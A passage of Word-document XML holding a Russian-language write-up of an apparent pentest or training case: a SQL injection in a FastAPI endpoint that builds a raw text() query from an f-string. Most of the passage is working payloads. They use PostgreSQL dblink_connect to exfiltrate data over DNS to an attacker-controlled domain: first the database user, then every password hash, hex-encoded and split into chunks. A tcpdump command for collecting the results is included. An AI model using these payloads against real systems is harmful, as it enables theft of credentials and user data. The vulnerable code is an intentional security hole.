        <w:t xml:space="preserve">, а startup-packet с полями </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уходит plaintext до возможной SSL-сессии — оба этапа становятся каналами эксфильтрации произвольных SQL-данных, даже если HTTP-ответ ничего не возвращает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB0636" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A25E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/search.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CD20D"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10833356" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14553254"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237869F4"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5D857A46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0B7F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8DF463" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E5779E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AD9B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_users(name: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE275A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51688F8C"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3357BE42"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482ABFFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = '&lt;input&gt;'</w:t>
      </w:r>
      <w:r>
        <w:t>. Параметризации нет, любая UNION/stacked инъекция проходит до сервера как одна команда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B146132" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — DNS-канал, простой (current_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1808C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий контролирует authoritative DNS для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker.tld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через Burp Collaborator или собственный bind с query-логом). Своего PostgreSQL-сервера поднимать не нужно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D5C58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C5B81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 1, dblink_connect('host=' || current_user || '.exfil.attacker.tld dbname=x user=x password=x') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516F6544" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CAFC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, email FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65404978" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = 'x' UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F7B2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  'host=' || current_user || '.exfil.attacker.tld dbname=x user=x password=x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A354D7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EA4352" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вычисляет conninfo, libpq делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo("app_user.exfil.attacker.tld")</w:t>
      </w:r>
      <w:r>
        <w:t>, DNS-запрос приходит на authoritative-сервер атакующего. TCP-коннект на 5432 потом упадёт (никто не слушает) — это нормально, payload уже сработал на этапе DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B258052" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего (минимум):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8BA55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn 'port 53' | grep exfil.attacker.tld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D121F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — DNS-канал, chunked hex (полная таблица)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F113827" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Эксфильтрация любого по объёму значения через серию DNS-запросов. Hex-encoding выбран потому, что DNS labels per RFC 1035 ограничены charset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[A-Za-z0-9-]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и длиной ≤ 63 байта. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode(..., 'hex')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантированно даёт только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[0-9a-f]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+/=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) для DNS-канала </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не подходят</w:t>
      </w:r>
      <w:r>
        <w:t>. Chunk-size 60 байт с запасом от лимита 63.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4232F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE69504" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EFBD95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  'host=' || c || '.exfil.attacker.tld dbname=x user=x password=x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3548ABCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF40442" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F542C93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH data AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3EB9A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT encode(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206502A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      convert_to(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E228E7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        (SELECT string_agg(password_hash, ',') FROM users),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC12D7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'UTF8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB440C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      ), 'hex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E2AD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) AS hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E79EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13489B05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT substring(hex FROM (i*60+1) FOR 60) AS c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FD685" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM data, generate_series(0, (length(hex)-1)/60) i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485A600" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) chunks --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E273E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397435D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, email FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A41408F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456792D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34739B46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'host=' || c || '.exfil.attacker.tld dbname=x user=x password=x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5218A3DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16537AE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM (</w:t>
